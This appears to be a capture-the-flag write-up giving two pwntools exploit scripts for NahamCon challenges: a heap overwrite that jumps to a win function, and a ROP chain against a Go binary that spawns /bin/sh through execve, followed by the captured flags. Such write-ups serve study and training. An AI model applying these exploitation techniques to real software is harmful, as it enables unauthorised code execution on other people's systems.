dplastico

So much cache

Simple heap challenge in a static-compiled binary:

#!/usr/bin/python3
from pwn import *
gs = '''
b *0x400C53
continue
'''
elf = context.binary = ELF('./so_much_cache')
context.terminal = ['tmux', 'splitw', '-hp', '70']

def start():
    if args.GDB:
        return gdb.debug('./so_much_cache', gdbscript=gs)
    if args.REMOTE:
        return remote('challenge.nahamcon.com', 32340)
    else:
        return process('./so_much_cache')
r = start()

def allocate(size, data):
    r.sendline(b"1")
    r.sendlineafter(b"size :", str(size).encode('ascii'))
    r.sendlineafter(b" data :", data)
    r.recvuntil(b"[1-5] :")

def free():
    r.sendline(b"2")
    r.recvuntil(b"[1-5] :")

def exit():
    r.sendline(b"3")
    r.recvuntil(b"[1-5] :")

def prepare():
    r.sendline(b"4")
    r.recvuntil(b"[1-5] :")

def jump(option):
    r.sendline(b"5")
    r.sendlineafter(b"(1, 2, or 3)", str(option).encode("ascii"))
    
#========= exploit here ===================

allocate(0x18, b"A"*0x18)
allocate(0x18, b"B"*0x18)
allocate(0x18, b"C"*0x18)
allocate(0x18, b"D"*0x18)
allocate(0x18, b"E"*0x28+p64(elf.sym.win))

prepare()
jump(2)

#========= interactive ====================
r.interactive()
#flag{7918c766cb889d2bb4dd83e73ab1745a}

gopherflow returns

gopherflow returns, was a golang binary. I spend a lot of time trying to setup gdb for golang 😦, also some NULL nytes where required when overflowing, since there was a check needed to be bypass

#!/usr/bin/python3
from pwn import *
gs = '''
source /usr/local/go/src/runtime/runtime-gdb.py
b *0x404aa1
continue
'''
elf = context.binary = ELF('./gopher_overflow')
context.terminal = ['tmux', 'splitw', '-hp', '70']

def start():
    if args.GDB:
        return gdb.debug('./gopher_overflow', gdbscript=gs)
    if args.REMOTE:
        return remote('challenge.nahamcon.com', 31883)
    else:
        return process('./gopher_overflow')
r = start()
#========= exploit here ===================
rop  = b""
rop += b"A" *0x10
rop += b"\0" * 0x20     # zero
rop += p64(0x51f100) *16 # write check sled
rop += b"\0"*0x40 #zero padding for checks
rop += p64(0x0000000000404aa1)# pop rbx; ret;
rop += b"/bin/sh\0"
rop += p64(0x0000000000401113) # mov rcx, rbx; add rsp, 0x10; pop rbp; ret;
rop += p64(0xdeadbeef)
rop += p64(0xdeadbeef)
rop += p64(0x51f100)
rop += p64(0x000000000045d480) #mov rax, rbp; ret;
rop += p64(0x000000000042cb73) # mov qword ptr [rax], rcx; ret; stores /bin/sh into 0x519100
#rdi
rop += p64(0x0000000000404aa1) # pop rbx; ret;
rop += p64(0x51f100) #rw
rop += p64(0x000000000044a7ff) # mov rdi, rbx; add rsp, 0x18; pop rbp; ret;)
rop += p64(0xdeadbeef)
rop += p64(0xdeadbeef)
rop += p64(0xdeadbeef)
rop += p64(0xdeadbeef)
##rsi
rop += p64(0x0000000000404aa1) # pop rbx; ret;
rop += p64(0)
rop += p64(0x0000000000401113) # mov rcx, rbx; add rsp, 0x10; pop rbp; ret;
rop += p64(0xdeadbeef)
rop += p64(0xdeadbeef)
rop += p64(0xdeadbeef) 
rop += p64(0x00000000004115c9) # mov rsi, rcx; add rsp, 0x10; pop rbp; ret;
rop += p64(0xdeadbeef)
rop += p64(0xdeadbeef)
rop += p64(0xdeadbeef) #
#RDX
rop += p64(0x000000000047a67a) # pop rdx; ret;
rop += p64(0)
##RAX
rop += p64(0x47cdb3)      # pop rax; pop rbp; ret;
rop += p64(0x3b)          # execve()
rop += p64(0xdeadbeef)           #=
##syscall
rop += p64(0x000000000045e5e9) #syscall; ret;
r.sendlineafter(b"the gopher?", rop)

#========= interactive ====================
r.interactive()
#flag{6a34c27f3bb3b25d98e7c1a1896217db}